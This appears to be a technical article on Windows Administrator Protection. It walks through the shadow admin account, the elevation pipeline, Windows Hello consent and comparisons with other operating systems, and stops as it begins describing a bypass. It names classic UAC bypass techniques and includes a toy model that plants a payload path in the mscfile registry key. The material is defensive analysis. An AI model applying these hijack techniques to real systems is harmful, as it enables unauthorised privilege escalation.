Per-elevation use. appinfo.dll's RAiLaunchAdminProcess RPC endpoint reads TypeOfAdminApprovalMode. When the value is 2, it walks the forward link to find the calling user's SMAA, launches consent.exe on the secure desktop in credential prompt mode (not Yes/No), authenticates the primary user via Windows Hello (PIN, fingerprint, face, or password fallback), asks the kernel to ask LSA for a fresh primary token for the SMAA in a brand-new logon session, and calls CreateProcessAsUser with that token, the user's requested executable, and the SMAA's profile environment [@ms-developer-blog-2025, @ms-admin-protection, @forshaw-pz-jan2026]. The credential-less LSA logon at the heart of this beat is walked in §7.

Teardown. When the elevated process exits, the SMAA's token handle goes out of scope. The logon session is reaped. The elevated profile directory remains on disk at C:\Users\ADMIN_<random>\ -- it has to, to preserve per-elevation user state across reboots -- but the live admin token does not. There is no persistent High-integrity process running between elevations [@ms-developer-blog-2025].
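The asymmetry between what persists and what does not can be sketched as a small model. This is an illustration under stated assumptions rather than a description of Windows internals: the class, its method names, and the `ADMIN_example` account name are all hypothetical.

```javascript
// Hypothetical lifecycle model; none of these names are real Windows APIs.
class SmaaLifecycleModel {
  constructor(accountName) {
    this.accountName = accountName;
    this.profileDir = "C:\\Users\\" + accountName; // stays on disk between elevations
    this.liveSessions = new Set();                 // logon sessions holding a live token
    this.nextSessionId = 1;
  }

  // Each elevation gets a fresh logon session in this model.
  beginElevation() {
    const sessionId = this.nextSessionId++;
    this.liveSessions.add(sessionId);
    return sessionId;
  }

  // Process exit: the session is reaped, the profile directory is untouched.
  endElevation(sessionId) {
    this.liveSessions.delete(sessionId);
  }
}

const smaa = new SmaaLifecycleModel("ADMIN_example");
const first = smaa.beginElevation();
smaa.endElevation(first);
const second = smaa.beginElevation();
smaa.endElevation(second);
console.log(first !== second, smaa.liveSessions.size, smaa.profileDir);
```

Between elevations the set of live sessions is empty while `profileDir` is unchanged, which is the property the Teardown beat describes.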

flowchart TD
Start[Policy enabled: TypeOfAdminApprovalMode = 2] --> Provision
Provision[samsrv.dll: CreateShadowAdminAccount per local admin] --> Naming
Naming[CreateRandomShadowAdminAccountName -> ADMIN_random] --> AddGroup
AddGroup[AddAccountToLocalAdministratorsGroup] --> Link
Link[SAM linkage: ShadowAccountForwardLinkSid / ShadowAccountBackLinkSid] --> Idle[SMAA exists, no token live]
Idle -->|Each elevation| RPC[appinfo.dll: RAiLaunchAdminProcess]
RPC --> Prompt[consent.exe: Hello credential prompt]
Prompt --> LSA[Kernel asks LSA: credential-less logon for SMAA]
LSA --> Run[CreateProcessAsUser with SMAA token]
Run -->|Process exits| Teardown[Token handle released; logon session reaped]
Teardown --> Idle

Windows creates a temporary isolated admin token to get the job done. This temporary token is immediately destroyed once the task is complete, ensuring that admin privileges do not persist. -- David Weston, Microsoft Ignite 2024 keynote, November 19, 2024 [@bleepingcomputer-2024]

Key idea: The single design decision behind Administrator Protection: the elevated and unelevated halves of an administrator must be different accounts. Different SID, different profile, different HKCU, different logon session, different DOS device object directory. The shared-resource attacks of the UAC bypass canon cannot persist if there are no shared resources.

The mechanism is now described. The next section walks it at function-name granularity for a single elevation, end to end -- and in particular, the credential-less LSA logon at step six that does the load-bearing work of minting the SMAA token without any SMAA credential.

7. The elevation pipeline end to end

Walk a single elevation. Nine steps.

1. The caller invokes ShellExecute or CreateProcess with an elevation request. For the shell-launched case the user right-clicks an executable and selects "Run as administrator"; the same RPC endpoint serves manifest-declared requestedExecutionLevel = "requireAdministrator" callers and Elevation:Administrator!new:<CLSID> COM moniker requests.
2. appinfo.dll's RAiLaunchAdminProcess RPC endpoint, hosted inside the Application Information service in svchost.exe, receives the call [@ms-uac-how-it-works].
3. appinfo reads HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\TypeOfAdminApprovalMode.
4. If the value is 2 (Admin Approval Mode with Administrator Protection), appinfo reads the calling user's SAM record, locates the ShadowAccountForwardLinkSid attribute, and validates the corresponding ShadowAccountBackLinkSid on the SMAA's SAM record. The linkage check is what binds a given elevated process to a given primary user; without both attributes pointing at each other, the elevation is refused [@call4cloud-osint].
5. appinfo launches consent.exe on the secure desktop in credential prompt mode rather than the classic Yes/No mode. The prompt asks the primary user to authenticate via Windows Hello (PIN, fingerprint, face, or password fallback), not the SMAA. The SMAA has no human credentials. The Windows Developer Blog states the property explicitly [@ms-developer-blog-2025], and Forshaw's January 2026 post restates it in operational terms: "The user does not need to know the credentials for the shadow administrator as there aren't any. Instead UAC can be configured to prompt for the limited user's credentials, including using biometrics if desired" [@forshaw-pz-jan2026].
6. On a positive Hello result, appinfo.dll -- running as NT AUTHORITY\SYSTEM inside the Application Information service -- asks the kernel to ask LSA for a fresh primary access token for the SMAA's SID in a brand-new logon session. The LSA logon is credential-less. The kernel asks LSA to authenticate "a new instance of the shadow administrator," and LSA fulfils the request without any SMAA credential because the SMAA has no credential to verify. The trust architecture mirrors the way the Service Control Manager asks LSA for service-account tokens: SCM is trusted to ask for the token; LSA mints it on the strength of the request rather than on the strength of any credential. In Administrator Protection, appinfo.dll is the trusted requester, and its request is gated on the user-side Hello result it received in step 5. The Forshaw quotation that anchors the mechanism follows this walk [@forshaw-pz-jan2026, @ms-developer-blog-2025].
7. appinfo calls CreateProcessAsUser with the SMAA token, the user's requested executable, and the SMAA's profile environment block (USERPROFILE=C:\Users\ADMIN_<random>, USERNAME=ADMIN_<random>, the SMAA's NTUSER.DAT mapped as HKCU).
8. The new process loads at High integrity, holding the SMAA's primary token, in a fresh logon session with a freshly minted authentication-ID LUID. The DOS device directory at \Sessions\0\DosDevices\<LUID> does not yet exist; the kernel will create it on first reference.
9. Subsequent SeAccessCheck calls on system objects evaluate against the SMAA's local Administrators group membership and succeed. The elevated process can write to HKLM, modify program files, install services, load WHQL-signed drivers (subject to App Control for Business and HVCI), and otherwise behave as a member of the Administrators group [@ms-developer-blog-2025].
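The decision points in the walk above (policy read, linkage check, Hello gate, token minting, process creation) can be sketched as one function with an explicit refusal at each gate. This is a simplified simulation, not appinfo.dll's implementation: `simulateElevation`, the `system` object shape, the field names, and the sample SIDs are all hypothetical scaffolding.

```javascript
// Simplified simulation of the elevation path. Every name below is
// hypothetical; the real service internals are not a public API.
function simulateElevation(system, request) {
  const trace = [];

  // Policy read: only mode 2 takes the SMAA path in this sketch.
  if (system.typeOfAdminApprovalMode !== 2) {
    return { ok: false, reason: "SMAA path not enabled", trace };
  }
  trace.push("policy: mode 2");

  // Linkage check: forward link on the caller, back link on the SMAA.
  const caller = system.sam[request.callerSid];
  const smaaSid = caller ? caller.forwardLink : undefined;
  const smaa = smaaSid ? system.sam[smaaSid] : undefined;
  if (!smaa || smaa.backLink !== request.callerSid) {
    return { ok: false, reason: "linkage check failed", trace };
  }
  trace.push("linkage: ok");

  // Consent gate: the primary user's gesture, never an SMAA credential.
  if (!system.verifyHello(request.callerSid)) {
    return { ok: false, reason: "Hello gesture not verified", trace };
  }
  trace.push("hello: ok");

  // Token minting: a fresh logon session for every elevation.
  const token = { sid: smaaSid, logonId: system.nextLogonId++, integrity: "High" };
  trace.push("token: minted");

  // Process creation under the SMAA's own profile environment.
  const environment = { USERNAME: smaa.name, USERPROFILE: "C:\\Users\\" + smaa.name };
  return { ok: true, process: { image: request.image, token, environment }, trace };
}

const demoSystem = {
  typeOfAdminApprovalMode: 2,
  nextLogonId: 0x1000,
  verifyHello: () => true, // stand-in for the consent.exe / Hello round trip
  sam: {
    "S-1-5-21-1-2-3-1001": { name: "alice", forwardLink: "S-1-5-21-1-2-3-1051" },
    "S-1-5-21-1-2-3-1051": { name: "ADMIN_example", backLink: "S-1-5-21-1-2-3-1001" },
  },
};

const demoRequest = { callerSid: "S-1-5-21-1-2-3-1001", image: "setup.exe" };
const run1 = simulateElevation(demoSystem, demoRequest);
const run2 = simulateElevation(demoSystem, demoRequest);
console.log(run1.trace.join(" | "));
console.log(run1.process.token.logonId !== run2.process.token.logonId);
```

Two back-to-back elevations for the same caller share the SMAA SID and profile but never the logon identifier, which is the property the later sections build on.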

Credential-less LSA logon. The mechanism by which the Local Security Authority mints a primary access token for the SMAA without verifying any SMAA credential. `appinfo.dll`, running as `NT AUTHORITY\SYSTEM` inside the Application Information service, requests the logon on the SMAA's behalf after the primary user has succeeded against the Hello credential gate. LSA fulfils the request because the *requester* is trusted; the architecture mirrors the way the Service Control Manager requests service-account tokens. The "credential-less" label is descriptive of the SMAA side of the exchange: the SMAA never has a human credential to verify, so LSA cannot and does not ask for one [@forshaw-pz-jan2026, @ms-developer-blog-2025].

The trust architecture is not new in Administrator Protection. The Service Control Manager has asked LSA for service-account tokens since Windows NT 3.1 in 1993; LSA accepts the request because SCM is the trusted requester, not because the service account presented a credential. Administrator Protection generalises the same pattern to elevation: appinfo.dll is the trusted requester, and the SMAA is its functional analogue of a service account. What is new is the user-side gate -- the trusted requester only makes the request after a positive Hello result on the primary user's credential.
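The trusted-requester pattern reduces to two checks: who is asking, and whether the user-side gate has passed. A minimal sketch follows, assuming a toy LSA object; `createLsaModel`, `logonWithoutCredential`, and `elevateIfHelloSucceeded` are hypothetical names, not LSA interfaces.

```javascript
// Hypothetical model of the trusted-requester pattern; not an LSA API.
function createLsaModel(trustedRequesters) {
  let nextLogonId = 1;
  return {
    // Mints a token because of who asks, not because of any credential
    // presented on behalf of targetSid.
    logonWithoutCredential(requester, targetSid) {
      if (!trustedRequesters.has(requester)) {
        throw new Error("requester is not trusted to ask for tokens");
      }
      return { sid: targetSid, logonId: nextLogonId++ };
    },
  };
}

// The element the text calls new: the trusted requester only asks after
// the primary user's Hello gesture has succeeded.
function elevateIfHelloSucceeded(lsa, helloSucceeded, smaaSid) {
  if (!helloSucceeded) return null;
  return lsa.logonWithoutCredential("NT AUTHORITY\\SYSTEM", smaaSid);
}

const lsa = createLsaModel(new Set(["NT AUTHORITY\\SYSTEM"]));
const granted = elevateIfHelloSucceeded(lsa, true, "S-1-5-21-1-2-3-1051");
const refused = elevateIfHelloSucceeded(lsa, false, "S-1-5-21-1-2-3-1051");
console.log(granted, refused);
```

Note that no argument anywhere in the sketch carries an SMAA password or key; the only inputs are the requester's identity and the outcome of the primary user's gesture.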

in Administrator Protection the kernel calls into the LSA and authenticates a new instance of the shadow administrator. This results in every token returned from `TokenLinkedToken` having a unique logon session, and thus does not currently have the DOS device object directory created. -- James Forshaw, *Bypassing Windows Administrator Protection*, Google Project Zero, January 26, 2026 [@forshaw-pz-jan2026]

The "unique logon session" property in Forshaw's quote is exactly the structural property the lazy-DOS-device-directory bypass exploits, and §12 walks that exploit in full. For now, the load-bearing observation is the credential-less logon itself: the SMAA token is real, the logon session is real, the integrity level is real, but no SMAA credential ever changes hands. The trust is in the requester, gated by a Hello gesture from the primary user.

sequenceDiagram
participant User as User shell (primary admin filtered token)
participant AppInfo as appinfo.dll (NT AUTHORITY\SYSTEM)
participant SAM as samsrv.dll / SAM database
participant Consent as consent.exe (secure desktop)
participant Hello as Windows Hello / TPM
participant LSA as LSASS
participant Elev as Elevated SMAA process

User->>AppInfo: ShellExecute "as admin"
AppInfo->>AppInfo: RAiLaunchAdminProcess RPC
AppInfo->>AppInfo: Read TypeOfAdminApprovalMode = 2
AppInfo->>SAM: Resolve ShadowAccountForwardLinkSid
SAM-->>AppInfo: SMAA SID + backlink check OK
AppInfo->>Consent: Launch consent.exe (credential mode)
Consent->>Hello: Request Hello gesture for primary user
Hello-->>Consent: PIN / biometric / password verified
Consent-->>AppInfo: Approved
AppInfo->>LSA: Credential-less logon for SMAA (trusted-requester pattern)
LSA-->>AppInfo: Fresh SMAA primary token and fresh LUID
AppInfo->>Elev: CreateProcessAsUser with SMAA token and profile
Note over Elev: Different SID and USERPROFILE and HKCU and LUID
Note over Elev: Integrity level High -- DOS device dir not yet created

A practical illustration of the shift, displayed as the diff between the pre-AP and post-AP elevated console session.

// Modelled output of 'whoami /all' run from an elevated console.
// Before: TypeOfAdminApprovalMode = 1 (classic UAC).
// After: TypeOfAdminApprovalMode = 2 (Administrator Protection).

const before = {
  user: 'CONTOSO\\alice',
  sid: 'S-1-5-21-123456789-987654321-1122334455-1001',
  profile: 'C:\\Users\\alice',
  authId: '0x3e7:0x000abcde',
  integrity: 'S-1-16-12288 (High)',
  groups: ['BUILTIN\\Administrators (Enabled)']
};

const after = {
  user: 'WIN11-PC\\ADMIN_9f2c7e1bdc4a8033',
  sid: 'S-1-5-21-123456789-987654321-1122334455-1051',
  profile: 'C:\\Users\\ADMIN_9f2c7e1bdc4a8033',
  authId: '0x3e7:0x000abf42',
  integrity: 'S-1-16-12288 (High)',
  groups: ['BUILTIN\\Administrators (Enabled)'],
  shadowBacklink: 'CONTOSO\\alice'
};

// Everything except the integrity level differs between the two sessions.
console.log('Different user name:', before.user !== after.user);
console.log('Different SID:', before.sid !== after.sid);
console.log('Different profile:', before.profile !== after.profile);
console.log('Different LUID:', before.authId !== after.authId);
console.log('Same integrity:', before.integrity === after.integrity);

The pipeline is now a single chain of named function calls. The next section asks what changed about the four shared-resource properties from §3, and which UAC-bypass family each fix forecloses.

8. The four shared-resources fixes, precisely

Each of the four shared resources from §3 maps to a precise Administrator Protection fix, and each fix maps to a named UAC-era attack class it forecloses.

| Shared resource (UAC) | Administrator Protection fix | UAC-era attack class foreclosed |
| --- | --- | --- |
| Same SID across both tokens | SMAA has its own SID; no shared user identity | Same-user file and registry ACE confusion |
| Same `%USERPROFILE%` | SMAA has `C:\Users\ADMIN_<random>\` | DLL side-load family (sysprep / CRYPTBASE) |
| Same `HKCU` hive | SMAA has its own `NTUSER.DAT` | Registry-hijack family (eventvwr, fodhelper, sdclt) |
| Same logon-session LUID | SMAA gets a fresh LUID per elevation | Token-theft via `TokenLinkedToken`; logon-session DOS device hijack |

Profile separation. The SMAA owns its own %USERPROFILE% directory tree under C:\Users\ADMIN_<random>\. Files created by elevated processes land there by default. Library folder divergence is the most visible consequence: an elevated Notepad's File > Save dialog opens at the SMAA's Documents, not the primary user's. The primary user cannot see those files in their own Explorer without explicit cross-profile navigation. What this separation closes is the writable-shared-directory premise of the Davidson 2009 DLL side-load family. Sysprep + CRYPTBASE was a profile-shared attack; without a shared profile, the elevated binary searches a different directory tree from the one the limited user can write to [@ms-developer-blog-2025].

Registry separation. The SMAA's HKCU maps to the SMAA's NTUSER.DAT, not the primary user's. When eventvwr.exe, running in an SMAA process, queries HKCU\Software\Classes\mscfile\shell\open\command, it reads the SMAA's hive, not the primary user's. The primary user has no write access to the SMAA's NTUSER.DAT. The entire registry-hijack family -- eventvwr / mscfile [@enigma0x3-2016-eventvwr], fodhelper / ms-settings, sdclt / IsolatedCommand [@enigma0x3-2017-sdclt], sdclt / App Paths [@enigma0x3-2017-app-paths] -- is foreclosed by the same property: the elevated binary's HKCU lookup walks a hive the attacker does not control [@ms-developer-blog-2025].
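The hive-resolution difference can be made concrete with a toy model in which each account's HKCU is a separate map. This is only a sketch of the lookup logic described above: the `hives` object, the `elevatedHkcuLookup` helper, the model labels, and the payload path are hypothetical.

```javascript
// Toy model: one Map per account stands in for that account's NTUSER.DAT.
const MSCFILE_COMMAND = "Software\\Classes\\mscfile\\shell\\open\\command";
const hives = { primaryUser: new Map(), smaa: new Map() };

// The limited user can write only to their own hive.
hives.primaryUser.set(MSCFILE_COMMAND, "C:\\Users\\alice\\payload.exe");

// An elevated process resolves HKCU against the hive of the account its
// token belongs to: the primary user under classic UAC, the SMAA under
// Administrator Protection.
function elevatedHkcuLookup(model, key) {
  const hive = model === "classic-uac" ? hives.primaryUser : hives.smaa;
  return hive.has(key) ? hive.get(key) : null;
}

console.log(elevatedHkcuLookup("classic-uac", MSCFILE_COMMAND));
console.log(elevatedHkcuLookup("administrator-protection", MSCFILE_COMMAND));
```

Under the classic model the planted value is what the elevated lookup returns; under the Administrator Protection model the same lookup finds nothing, because the attacker's write landed in a hive the elevated process never consults.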

Logon-session separation. Every SMAA elevation gets a fresh authentication-ID LUID. The Local Security Authority allocates a new logon session for each elevation; when the elevated process exits, the session is reaped. Per-logon-session kernel resource caches, including the DOS device object directory at \Sessions\0\DosDevices\<LUID> and the credential cache, do not flow across the boundary. Token handles cannot be reused. Drive-letter overrides under the limited user's logon session do not appear in the SMAA's session [@forshaw-pz-jan2026].

No auto-elevation. The autoElevate=true manifest attribute is no longer honoured by appinfo.dll under TypeOfAdminApprovalMode = 2. Every elevation that previously went silent now prompts. The Windows Developer Blog states the change directly: "With administrator protection, all auto-elevations in Windows are removed and users need to interactively authorize every admin operation" [@ms-developer-blog-2025]. Forshaw's January 2026 framing of the consequence: "as auto-elevation is no longer permitted they will always show a prompt, therefore these are not considered bypasses" [@forshaw-pz-jan2026]. This is the single most consequential fix in the design. The auto-elevation whitelist was the bypass; removing the whitelist eliminates the class at the source, including the entire silent-elevation primitive class that Forshaw's older RAiProcessRunOnce research relied on.
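The change in behaviour can be summarised as a small decision function. This is a deliberately collapsed sketch: classic UAC's real auto-elevation test involves more conditions than the manifest attribute, and they are folded into a single hypothetical `trustedWindowsBinary` flag here. The function name and return labels are likewise illustrative.

```javascript
// Hypothetical decision helper. The trustedWindowsBinary flag stands in for
// every classic-UAC condition other than the manifest attribute itself.
function elevationBehaviour(typeOfAdminApprovalMode, binary) {
  switch (typeOfAdminApprovalMode) {
    case 2:
      // Administrator Protection: autoElevate is ignored, every request prompts.
      return "credential-prompt";
    case 1:
      // Classic Admin Approval Mode: eligible binaries elevate silently.
      return binary.autoElevate && binary.trustedWindowsBinary
        ? "silent"
        : "consent-prompt";
    default:
      // Other values are outside this sketch.
      return "unmodelled";
  }
}

const autoElevating = { autoElevate: true, trustedWindowsBinary: true };
console.log(elevationBehaviour(1, autoElevating));
console.log(elevationBehaviour(2, autoElevating));
```

The same binary description yields a silent elevation under mode 1 and a prompt under mode 2, which is why the silent-bypass techniques built on auto-elevating binaries lose their starting point.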

Multi-user separation is the original UNIX privilege model. The `root` user holds privilege; ordinary users do not; the boundary between them is the file-permission system enforced by the kernel. Windows NT shipped the same primitives in 1993 -- discretionary access control lists on every securable object, per-user profiles, multi-user logon sessions -- but the surrounding culture treated Administrator-as-default as the path of least resistance. The architectural sophistication in Administrator Protection is in *linkage* (the SAM forward / back attributes), *lifecycle* (provisioning on policy enable, teardown on process exit), and *enforcement* (removal of auto-elevation as a mechanism). The primitives themselves are old.

The four fixes share a property. Each one breaks a shared resource that an attacker depends on. But there is one more piece of the redesign that has not yet been described: the prompt itself is no longer a Yes/No click-through. The next section asks what happens when the consent UI becomes a credential.

9. Windows Hello as the consent gate

The classic UAC prompt is a Yes / No on the secure desktop. Administrator Protection turns the prompt into a credential prompt for the primary user's Windows Hello: a PIN, a fingerprint, a face match, or a password fallback. The credential is for the primary user, not the SMAA, because the SMAA has no human credentials; the Hello verification is what authorises the cross-profile elevation [@ms-admin-protection, @ms-developer-blog-2025, @forshaw-pz-jan2026].

To talk precisely about what the gate does, name the primitive it closes. Under classic UAC, the consent prompt treated a click on the secure desktop as sufficient evidence of consent; physical presence was the entire evidence requirement. That primitive shows up in three sub-cases that the UAC literature has documented for two decades.

Consent-without-identity-verification. The primitive by which the legacy UAC consent dialog accepted a click on the secure desktop as sufficient evidence of consent, without verifying *who* clicked. Three operational sub-cases follow. *Unattended-session click-through* -- an attacker (or co-located third party) with brief physical access to an unlocked screen showing a UAC prompt clicks Yes on the presumption that whoever is at the keyboard is the legitimate user. *Habituated-click click-through* -- the legitimate user has clicked Yes on hundreds of UAC prompts and clicks one more without conscious attention. *Pretext click-through* -- a malicious application argues a legitimate-looking case to the user and elicits the Yes click. Administrator Protection's credential gate cost-raises all three sub-cases without fully eliminating any [@forshaw-pz-jan2026, @ms-admin-protection].

Unattended-session click-through. An attacker who walks up to an unlocked screen showing a UAC prompt can click Yes and elevate. The legitimate user has authenticated; the prompt assumes the person at the keyboard is the legitimate user. Post-AP, the click is not sufficient. The Hello biometric or PIN is required, and the attacker (who has neither) cannot complete the gesture. Microsoft's Ignite 2024 framing addresses this primitive implicitly with "elevation rights only when needed" and "interactively authorize every admin operation" [@bleepingcomputer-2024].

Habituated-click click-through. A user who has clicked Yes on hundreds of UAC prompts over the course of a year clicks Yes on a malicious one as reflex. The classic UAC prompt requires no attentional engagement beyond physical presence and a click. Hello's gesture (a four-digit PIN entry, a fingerprint press, a face-recognition glance) is higher-friction and harder to perform inattentively. The Windows Developer Blog frames the property as "just-in-time administrator privileges, incorporating Windows Hello to enhance both security and user convenience" [@ms-developer-blog-2025].

Pretext click-through. A malicious application that argues its case to the user -- a fake installer, a re-skinned setup utility, a Trojan masquerading as a legitimate update -- can elicit a Yes click pre-AP. Post-AP, the user is also asked for a credential, which is a stronger user-side check. The user is more likely to interrogate "why am I being asked for my PIN again?" than "why is a prompt appearing?" Microsoft Learn captures the intent as "users are aware of potentially harmful actions before they occur, providing an extra layer of defense against threats" [@ms-admin-protection].

None of the three sub-cases is fully eliminated. Forshaw is explicit that visible-prompt bypasses are not classified as security vulnerabilities by Microsoft's design-document position: bypasses that result in a visible prompt are not security bulletins, because the user could equivalently have launched the prompt themselves [@forshaw-pz-jan2026]. What the gate does is cost-raise each sub-case. The unattended-screen attack requires a stolen PIN or coerced biometric. The habituated user must perform a gesture they cannot perform inattentively. The pretext attack must justify the second authentication, not just the first.

What it does not close is worth naming, because three primitives that look like they belong on the credential gate's account sheet were already closed by independent mechanisms, and the article should say so to avoid the common over-attribution mistake.

Synthetic-keystroke SendInput against consent.exe. Already closed by UIPI in Vista 2006, and doubly closed by the secure-desktop switch to Winsta0\Winlogon. Even UI Access processes -- whose purpose is to bypass UIPI for accessibility -- cannot reach into the secure desktop [@forshaw-pz-feb2026].
Headless UI Automation against the prompt. Same UIPI / secure-desktop boundary closes it. Redundant with respect to the credential gate.
CVE-2019-1388-class UI-interaction paths surfaced through the prompt's own UI. Closed by Microsoft's November 2019 HHCtrl patch and the cert-viewer UI redesign, prior to any Administrator Protection development [@nvd-cve-2019-1388].

The credential is hardware-rooted via TPM or Pluton on capable hardware. The PIN is unsealed only under the user's gesture; the biometric flows through Enhanced Sign-in Security (ESS) on capable hardware; the credential itself never leaves the Trusted Platform Module or Pluton enclave when ESS is engaged [@ms-windows-hello-ess]. The detail of the Hello architecture itself -- FIDO2 attestation, the ngc protector, the ESS isolation path through the Secure Kernel -- belongs to the Windows Hello article in this series, and is not re-derived here.

The new risk the gate does not close is the obvious one. Phishing the prompt now phishes a real credential, not just consent. A malicious application that can convince the user to authenticate on its behalf gets the elevation the user would otherwise have given to a legitimate request. The credential remains hardware-rooted and is not exfiltrated to the malware, but the elevation produces a working SMAA token in the attacker's process. This is the surface §15 carries forward to open problems.

Key idea: The credential gate closes one specific primitive: consent-without-identity-verification. It cost-raises three sub-cases (unattended-session, habituated-click, pretext click-through) without eliminating any. The structural boundary is profile separation plus fresh logon session plus auto-elevation removal; the credential gate is the fourth, defence-in-depth, property that ensures the boundary cannot be silently crossed by anyone holding only the limited user's physical access.

The prompt is a credential gate, but it remains a UI element. The next section asks how this elevation model compares to what other operating systems do.

10. Competing approaches: what other operating systems do

Four one-paragraph treatments. The article does not re-derive each system; it positions Administrator Protection against the field.

Linux: sudo plus PolKit pkexec plus PAM modules. The authority model on Linux is file-based. /etc/sudoers (or its LDAP equivalent) is the policy table; the sudoers plugin reads it and decides whether to permit a given user to run a given command [@sudo-ws-sudoers]. PolKit -- polkitd and its authentication-agent helpers -- is the parallel mechanism for GUI privileged-service requests, with actions and mechanisms separated in the polkit configuration files [@polkit-docs]. Biometric integration arrives through the PAM stack: pam_fprintd for fingerprint, pam_u2f for FIDO2 tokens, pam_yubico for Yubikeys. There is no profile separation by default; sudo -i switches HOME to root's home directory but does not separate per-elevation. The model is per-command authorisation, not per-account isolation.

macOS: Authorization Services plus Touch ID via pam_tid. GUI elevation prompts are gated by authorizationdb, a property-list-format policy database whose rules name which credentials (admin password, Touch ID, system-wide entitlements) authorise which actions [@apple-auth-services]. Touch ID is verified by the Secure Enclave Processor; the credential never leaves the SEP, and Authorization Services integrates with pam_tid to allow sudo invocations to use the gesture [@apple-pam-tid]. There is no separate admin profile; Transparency, Consent, and Control (TCC) guards privileged resource access at the per-action level, not the per-profile level. The Mac architecture privileges hardware-rooted consent (Touch ID, Secure Enclave) over account separation.

Microsoft's own sudo.exe (Windows 11 24H2). An inbox terminal transport that triggers the existing UAC or Administrator Protection pipeline; not an alternative to either [@ms-sudo-docs]. The forceNewWindow mode opens an elevated console in a new window. The disableInput mode keeps the elevated console in the current window but blocks keyboard input to it from the unelevated terminal. The normal (inline) mode preserves POSIX-style pipes between the unelevated and elevated processes. Microsoft Learn warns explicitly about the inline mode: "Sudo for Windows can be used as a potential escalation of privilege vector when enabled in certain configurations" [@ms-sudo-docs]. The mechanism is RPC between the unelevated and elevated sudo.exe processes; the elevation itself still goes through appinfo.dll.

Intune Endpoint Privilege Management (EPM). Cloud-policy-driven virtual-account elevation [@ms-epm-overview]. EPM performs elevation via a virtual account that is not a member of the local Administrators group; the elevation rights are conferred only for the duration of the policy-permitted action. Three elevation modes are available: Automatic (no user interaction), User-confirmed (a prompt), and Elevate as Current User (the action runs as the user's elevated identity rather than the virtual account). EPM is architecturally complementary to Administrator Protection: EPM is the enterprise policy story, Administrator Protection is the per-device architecture story. The two can coexist on the same device.

The distinguishing property of Administrator Protection in this comparison is whole-profile separation: the SMAA's own profile, the SMAA's own HKCU, the SMAA's own library folders, plus a fresh logon session per elevation. Neither Linux sudo nor macOS Authorization Services provides that property as a default desktop primitive. EPM provides per-elevation isolation via the virtual account but does not give the elevated process a persistent profile, which is what makes Administrator Protection's compatibility story so different from EPM's.

Administrator Protection is the architecturally tightest desktop elevation model now in production. The next section asks where the boundary still leaks.

11. Theoretical limits: what Administrator Protection cannot fix

Four structural ceilings.

Showing a prompt is not crossing the boundary. Microsoft's design position is explicit: bypasses that result in a visible elevation prompt are not security bulletins, because the user could equivalently have right-clicked "Run as administrator." Forshaw's January 2026 post spells out the consequence: "I expect that malware will still be able to get administrator privileges even if that's just by forcing a user to accept the elevation prompt" [@forshaw-pz-jan2026]. Operationally, social-engineering the consent dialog remains a structural attack surface. The prompt is a UI element. The boundary is the credential gate. The gate is only as strong as the user's resistance to whatever pretext induces them to authenticate.

The MSRC servicing-criteria definition of a security boundary: a logical separation between code or data of different trust levels, intended to be enforced by the operating system and accompanied by a Microsoft commitment to issue a security update when an unauthorised crossing is found. UAC under the classic split-token model is classified as a *security feature*, not a boundary; bypasses receive quality-fix attention but not security-bulletin attention. Administrator Protection is the first elevation mechanism classified as a security boundary, with bulletin-grade fixes when it fails [@msrc-servicing-criteria, @forshaw-pz-jan2026].

Admin equals kernel. Once code is running inside an SMAA elevated process, it has the local Administrators group; it can write to HKLM; it can install services; it can load WHQL-signed drivers; it can call into kernel-mode interfaces gated by SeLoadDriverPrivilege and the App Control for Business policy. The MSRC servicing-criteria position that "admin-to-kernel is not a security boundary" continues to apply inside the SMAA [@msrc-servicing-criteria]. Administrator Protection makes the path to admin into a boundary; it does not change the relationship between admin and kernel. Driver-loading controls remain the domain of WHQL signing, the Microsoft Vulnerable Driver Blocklist (default-on in Windows 11 since the 2022 update), App Control for Business policies, and Hypervisor-protected Code Integrity (HVCI) [@ms-vuln-driver-blocklist]. The App Identity article in this series covers the App Control mechanism in detail.

The SMAA is in the local Administrators group. Discretionary access control list-based exposures of admin-only resources -- CREATOR OWNER ACEs on persistent objects, world-writable DACLs on certain \Sessions\0\DosDevices entries, default-permissive ACLs on a handful of legacy registry trees -- still grant the SMAA full access. The boundary is between standard user and SMAA, not between SMAA and SYSTEM. The SMAA is a high-privilege actor inside the operating system; the relationship between it and the rest of the privileged surface is unchanged.

Out of scope per Microsoft Learn. Remote logon, roaming profiles, backup-admin accounts, Managed Service Accounts and group Managed Service Accounts (MSAs and gMSAs), virtual accounts for services, and domain-admin scenarios are explicitly outside the Administrator Protection model in its current form [@ms-admin-protection]. The feature is local-machine-only, interactive-admin-only. Domain administrators who log into a workstation will not see the SMAA path; service accounts under LOCAL SERVICE, NETWORK SERVICE, or IIS_IUSRS are unaffected.

Key idea: A genuine architectural ceiling on consent-prompt elevation: the prompt is a UI element; the boundary is the credential gate; the gate is only as strong as the user's resistance to social engineering. Closing the gap requires out-of-band consent (smartcard, phone push) or per-action policy without human consent in the loop (EPM's automatic mode). Neither is the default.

Four limits, four sentences. The next section walks the concrete evidence of what actually leaked in the pre-GA Insider Preview builds, and what Microsoft did about it.

12. Forshaw's nine bypasses, classified

Between October 2024, when Administrator Protection first appeared in Insider Preview build 27718, and October 2025, when KB5067036 made the feature available on stable Windows, James Forshaw of Google Project Zero audited the mechanism and found nine separate silent-bypass paths. Microsoft fixed all nine -- either in the KB5067036 ship or in subsequent security bulletins [@forshaw-pz-jan2026]. The fact pattern is the structural confirmation that Administrator Protection is now treated as a security boundary. Under the UAC classification, none of those nine would have received CVEs. Each one would have been a quality bug. The bypass canon ran for twenty years without bulletins. The fact that the first cohort of Administrator Protection bypasses produced nine bulletin-eligible fixes is exactly the change in posture the classification change implies.

All the issues that I reported to Microsoft have been fixed, either prior to the feature being officially released (in optional update KB5067036) or as subsequent security bulletins. -- James Forshaw, *Bypassing Windows Administrator Protection*, Google Project Zero, January 26, 2026 [@forshaw-pz-jan2026]

Walk the nine as three classes.

The lazy DOS device directory hijack

This is the single most interesting vulnerability in the feature's history, covered in Forshaw's January 26, 2026 deep analysis [@forshaw-pz-jan2026] and tracked as Project Zero issue 432313668 [@pz-issue-432313668]. The mechanism turns on a behaviour change Administrator Protection itself introduced. Every SMAA elevation gets a fresh logon session, which means the per-logon-session DOS device object directory at \Sessions\0\DosDevices\<LUID> is not created at SMAA logon time. The kernel routine SeGetTokenDeviceMap creates the directory lazily, on the first reference. The owner of the new directory is the owner of the access token that triggered the creation [@forshaw-pz-jan2026, @theregister-2026].

